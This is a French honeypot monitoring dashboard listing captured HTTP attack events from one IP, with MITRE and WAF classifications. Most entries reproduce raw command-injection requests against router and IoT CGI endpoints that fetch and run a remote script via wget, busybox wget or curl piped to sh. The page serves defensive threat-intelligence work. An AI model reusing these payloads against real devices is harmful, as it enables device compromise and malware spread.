Profil de menace
Activité suspecte — risque 64/100 (Moyen) — MITRE T1083 — confiance 100 % — via HTTP
Activité suspecte — risque 64/100 (Moyen) — MITRE T1083 — confiance 100 % — via HTTP
Synthèse décisionnelle honeypot — seuil de listing maintenu à 1 événement qualifié.
Sonde fichier sensible: chemin sensible (tag interne) · Règle WAF « lfi-12 » · Sonde fichier sensible / config · confiance 100%
Confiance 100 % — Score WAF 100 · 9 tag(s) WAF
ASN 197170 · 45.153.34.0/24 · RIPENCC — 8 pair(s) ASN/FAI listé(s) — activité locale élevée vs pairs · 181 événements sur la période pour cette IP.
Même FAI TechTies Inc. — corrélation indicative.
Origine réseau déclarée
Opérateur et dernière activité ban
Score capteur — surveiller, investiguer ou bloquer.
Les dates De/À priment sur la période. Affinez protocole, port, service et classification.
181 événements filtrés — activité quotidienne
Top ports ciblés sur les dernières 24 heures
SSH 22, RDP 3389, HTTP alternatifs…
Web, SSH, SAP, scans…
Intensité par jour et heure (UTC capteur)
181 événement(s) — page 3/4
| Horodatage | Proto | Port | Service | Classification | Sévérité | Risque | Actions |
|---|---|---|---|---|---|---|---|
| TCP | 8081 · HTTP | http | Sonde fichier configuration config file probe · via HTTP:8081 · (tentative d'exploit) · → /wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wg… | Élevée | Moyen · 64 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1083
TA0001
TA0002
Protocole
GET /wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20d…
Émulateur
HTTP
WAF
48
Recommandation
Investiguer
Tags
Cible HTTP
GET
/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20dlcli%60
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8081
Chemin / cible
/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20dlcli%…
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: chemin sensible (tag interne) · Règle WAF « lfi-12 » · Sonde fichier sensible / config · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 64
Confiance : Confiance 100 % — 7 tag(s) WAF
Protocole émulé
1
Signaux
Http Sensitive
Upstream
Waf Score
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
redir-1
Payload (extrait)
GET /login.cgi?cli=%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http://91.92.40.
Requête brute (extrait)
GET /login.cgi?cli=%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20dlcli%60 HTTP/1.1 Host: 62.3.50.33:8081 C |
|||||||
| TCP | 8081 · HTTP | http | Énumération API REST rest api enum · via HTTP:8081 · (sonde / probe) · → /api/v1/status | Élevée | Moyen · 61 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0007
TA0007
TA0001
Protocole
GET /api/v1/status
Émulateur
HTTP
WAF
25
Recommandation
Investiguer
Tags
Cible HTTP
GET
/api/v1/status
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8081
Chemin / cible
/api/v1/status
Service
HTTP
Pourquoi cette classification : Énumération API REST (tag lfi-14) · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 61
Confiance : Confiance 100 % — 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1190-api
Upstream
Waf Score
Api Probe Generic
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 932100 cmd exec
CRS 932120 pipe chain
CRS 932190
CRS 932200
CRS 932205
CRS 932206
CRS 932321
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-14
rce-0
nosqli-3
k8s-api
Payload (extrait)
GET /api/v1/status?command=`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s xiaomi;busybox wget http://91.92.40.118/wget.sh -
Requête brute (extrait)
GET /api/v1/status?command=`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s xiaomi;busybox wget http://91.92.40.118/wget.sh -O-|sh -s xiaomi;curl http://91.92.40.118/wget.sh|sh -s xiaomi` HTTP/1.1 Host: 62.3.50.33:8081 Connection: close |
|||||||
| TCP | 8081 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:8081 · (tentative d'exploit) · → /wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20… | Élevée | Moyen · 60 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
GET /wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%2…
Émulateur
HTTP
WAF
48
Recommandation
Investiguer
Tags
Cible HTTP
GET
/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20billion%60
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8081
Chemin / cible
/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20bi…
Service
HTTP
Pourquoi cette classification : Type « lfi_path_traversal » (signaux protocolaires) · confiance 59%
Confiance classification
59%
Risque capteur
Moyen
· 60
Confiance : Confiance 59 % — 7 tag(s) WAF
Protocole émulé
1
Signaux
CRS-930100-sub
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
redir-1
Payload (extrait)
GET /adv_remotelog.asp?syslogServerAddr=%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20
Requête brute (extrait)
GET /adv_remotelog.asp?syslogServerAddr=%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20billion%60 HTTP/1. |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /cgi-bin/makeRequest.cgi | Élevée | Moyen · 63 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /cgi-bin/makeRequest.cgi
Émulateur
HTTP
WAF
20
Recommandation
Investiguer
Tags
Cible HTTP
POST
/cgi-bin/makeRequest.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/cgi-bin/makeRequest.cgi
Service
HTTP
Pourquoi cette classification : Injection de commande (tag rce-0) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 63
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
Http Cmdi
pat-0775
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932120 pipe chain
CRS 932205
Ligne de requête
User-Agent
—
Règles WAF
rce-0
rce-5
nosqli-3
Payload (extrait)
POST /cgi-bin/makeRequest.cgi HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length:
Requête brute (extrait)
POST /cgi-bin/makeRequest.cgi HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 32 Connection: close date=wget 91.92.40.118/r|sh -s w |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /edgserver/capture_packages | Élevée | Moyen · 54 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
GET /edgserver/capture_packages
Émulateur
HTTP
WAF
13
Recommandation
Investiguer
Tags
Cible HTTP
GET
/edgserver/capture_packages
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8081
Chemin / cible
/edgserver/capture_packages
Service
HTTP
Pourquoi cette classification : Injection de commande (tag rce-0) · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 54
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
MITRE-T1059
pat-0773
pat-0775
pat-0144
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 932100 cmd exec
CRS 932120 pipe chain
CRS 932190
CRS 932200
CRS 932205
CRS 932206
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /edgserver/capture_packages?param=`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s advan;busybox wget http://91.92.40.118
Requête brute (extrait)
GET /edgserver/capture_packages?param=`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s advan;busybox wget http://91.92.40.118/wget.sh -O-|sh -s advan;curl http://91.92.40.118/wget.sh|sh -s advan` HTTP/1.1 Host: 62.3.50.33:8081 Connection: close |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /command.php | Élevée | Élevé · 82 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /command.php
Émulateur
HTTP
WAF
41
Recommandation
Investiguer
Tags
Cible HTTP
POST
/command.php
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/command.php
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 82
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
MITRE-T1059
Http Cmdi
pat-0773
pat-0775
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932100 cmd exec
CRS 932120 pipe chain
CRS 932200
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /command.php HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 164 Connect
Requête brute (extrait)
POST /command.php HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 164 Connection: close cmd=`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s dlcmd;busybox wget http://91.92.40.118/wget.sh -O-|sh -s d |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /api/network/settings | Élevée | Élevé · 82 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /api/network/settings
Émulateur
HTTP
WAF
51
Recommandation
Investiguer
Tags
Cible HTTP
POST
/api/network/settings
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/api/network/settings
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 82
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
MITRE-T1059
Http Cmdi
pat-0773
pat-0775
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932100 cmd exec
CRS 932120 pipe chain
CRS 932200
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
k8s-api
Payload (extrait)
POST /api/network/settings HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 166
Requête brute (extrait)
POST /api/network/settings HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 166 Connection: close hostname=`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s russ;busybox wget http://91.92.40.118/wget.s |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /cgi-bin/wireless.cgi | Élevée | Élevé · 82 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /cgi-bin/wireless.cgi
Émulateur
HTTP
WAF
47
Recommandation
Investiguer
Tags
Cible HTTP
POST
/cgi-bin/wireless.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/cgi-bin/wireless.cgi
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 82
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
MITRE-T1059
Http Cmdi
pat-0773
pat-0775
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932100 cmd exec
CRS 932120 pipe chain
CRS 932200
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /cgi-bin/wireless.cgi HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 171
Requête brute (extrait)
POST /cgi-bin/wireless.cgi HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 171 Connection: close sz11gChannel=1`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s wdr1;busybox wget http://91.92.40.118/w |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /cgi-bin/internet.cgi | Élevée | Élevé · 82 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /cgi-bin/internet.cgi
Émulateur
HTTP
WAF
47
Recommandation
Investiguer
Tags
Cible HTTP
POST
/cgi-bin/internet.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/cgi-bin/internet.cgi
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 82
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
MITRE-T1059
Http Cmdi
pat-0773
pat-0775
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932100 cmd exec
CRS 932120 pipe chain
CRS 932200
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /cgi-bin/internet.cgi HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 176
Requête brute (extrait)
POST /cgi-bin/internet.cgi HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 176 Connection: close gateway=192.168.1.1`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s wdr2;busybox wget http://91.92.40. |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /cgi-bin/adm.cgi | Élevée | Élevé · 82 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /cgi-bin/adm.cgi
Émulateur
HTTP
WAF
47
Recommandation
Investiguer
Tags
Cible HTTP
POST
/cgi-bin/adm.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/cgi-bin/adm.cgi
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 82
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
MITRE-T1059
Http Cmdi
pat-0773
pat-0775
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932100 cmd exec
CRS 932120 pipe chain
CRS 932200
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /cgi-bin/adm.cgi HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 186 Con
Requête brute (extrait)
POST /cgi-bin/adm.cgi HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 186 Connection: close reboot_enabled=1&reboot_time=`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s wdr3;busybox wget http://91.9 |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /cgi-bin/luci | Élevée | Moyen · 61 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
GET /cgi-bin/luci
Émulateur
HTTP
WAF
19
Recommandation
Investiguer
Tags
Cible HTTP
GET
/cgi-bin/luci
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8081
Chemin / cible
/cgi-bin/luci
Service
HTTP
Pourquoi cette classification : Injection de commande (tag rce-0) · Sonde fichier sensible / config · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 61
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
MITRE-T1059
pat-0773
pat-0775
pat-0144
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 932100 cmd exec
CRS 932120 pipe chain
CRS 932190
CRS 932200
CRS 932205
CRS 932206
LFI Double-dot bypass
Probe /cgi-bin/luci
Ligne de requête
User-Agent
—
Règles WAF
rce-0
nosqli-3
webshell-param-cmd
Payload (extrait)
GET /cgi-bin/luci?cmd=`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s tuoshi;busybox wget http://91.92.40.118/wget.sh -O-|sh
Requête brute (extrait)
GET /cgi-bin/luci?cmd=`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s tuoshi;busybox wget http://91.92.40.118/wget.sh -O-|sh -s tuoshi;curl http://91.92.40.118/wget.sh|sh -s tuoshi` HTTP/1.1 Host: 62.3.50.33:8081 Connection: close |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /rc/index.php | Élevée | Moyen · 63 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
GET /rc/index.php
Émulateur
HTTP
WAF
21
Recommandation
Investiguer
Tags
Cible HTTP
GET
/rc/index.php
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8081
Chemin / cible
/rc/index.php
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-14) · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 63
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
MITRE-T1059
pat-0773
pat-0775
pat-0145
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 932100 cmd exec
CRS 932120 pipe chain
CRS 932200
CRS 932205
CRS 932206
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-14
rce-0
nosqli-3
Payload (extrait)
GET /rc/index.php?param=`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s mdomo;busybox wget http://91.92.40.118/wget.sh -O-|s
Requête brute (extrait)
GET /rc/index.php?param=`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s mdomo;busybox wget http://91.92.40.118/wget.sh -O-|sh -s mdomo;curl http://91.92.40.118/wget.sh|sh -s mdomo` HTTP/1.1 Host: 62.3.50.33:8081 Connection: close |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /api/tunnel/tailscale-install | Élevée | Élevé · 82 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /api/tunnel/tailscale-install
Émulateur
HTTP
WAF
51
Recommandation
Investiguer
Tags
Cible HTTP
POST
/api/tunnel/tailscale-install
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/api/tunnel/tailscale-install
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 82
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
MITRE-T1059
Http Cmdi
pat-0773
pat-0775
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932100 cmd exec
CRS 932120 pipe chain
CRS 932200
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
k8s-api
Payload (extrait)
POST /api/tunnel/tailscale-install HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/json Content-Length: 176 Connect
Requête brute (extrait)
POST /api/tunnel/tailscale-install HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/json Content-Length: 176 Connection: close {"cmd":"`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s 9router;busybox wget http://91.92.40.118/wget.sh -O-|s
|
|||||||
| TCP | 8081 · HTTP | http | Sonde fichier configuration config file probe · via HTTP:8081 · (tentative d'exploit) · → /wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20… | Élevée | Moyen · 64 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1083
TA0001
TA0002
Protocole
GET /wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%2…
Émulateur
HTTP
WAF
47
Recommandation
Investiguer
Tags
Cible HTTP
GET
/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20alcatel;
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8081
Chemin / cible
/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20al…
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: chemin sensible (tag interne) · Règle WAF « lfi-12 » · Sonde fichier sensible / config · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 64
Confiance : Confiance 100 % — 7 tag(s) WAF
Protocole émulé
1
Signaux
Http Sensitive
Upstream
Waf Score
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
redir-1
Payload (extrait)
GET /cgi-bin/masterCGI?ping=nomip&user=;cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wge
Requête brute (extrait)
GET /cgi-bin/masterCGI?ping=nomip&user=;cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20alcatel; HTTP/1.1 Ho |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /cgi-bin/;cd | Élevée | Moyen · 54 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
GET /cgi-bin/;cd
Émulateur
HTTP
WAF
13
Recommandation
Investiguer
Tags
Cible HTTP
GET
/cgi-bin/;cd
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8081
Chemin / cible
/cgi-bin/;cd
Service
HTTP
Pourquoi cette classification : Injection de commande (tag rce-0) · Sonde fichier sensible / config · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 54
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
MITRE-T1059
pat-0773
pat-0775
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 932100 cmd exec
CRS 932120 pipe chain
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /cgi-bin/;cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s wavlink;busybox wget http://91.92.40.118/wget.sh -O-|sh -s wavl
Requête brute (extrait)
GET /cgi-bin/;cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s wavlink;busybox wget http://91.92.40.118/wget.sh -O-|sh -s wavlink;curl http://91.92.40.118/wget.sh|sh -s wavlink HTTP/1.1 Host: 62.3.50.33:8081 Connection: close |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /Security/auditLog/search | Élevée | Moyen · 54 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
GET /Security/auditLog/search
Émulateur
HTTP
WAF
13
Recommandation
Investiguer
Tags
Cible HTTP
GET
/Security/auditLog/search
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8081
Chemin / cible
/Security/auditLog/search
Service
HTTP
Pourquoi cette classification : Injection de commande (tag rce-0) · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 54
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
MITRE-T1059
pat-0773
pat-0775
pat-0144
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 932100 cmd exec
CRS 932120 pipe chain
CRS 932190
CRS 932200
CRS 932205
CRS 932206
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /Security/auditLog/search?logTime=0;`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s hik3;busybox wget http://91.92.40.11
Requête brute (extrait)
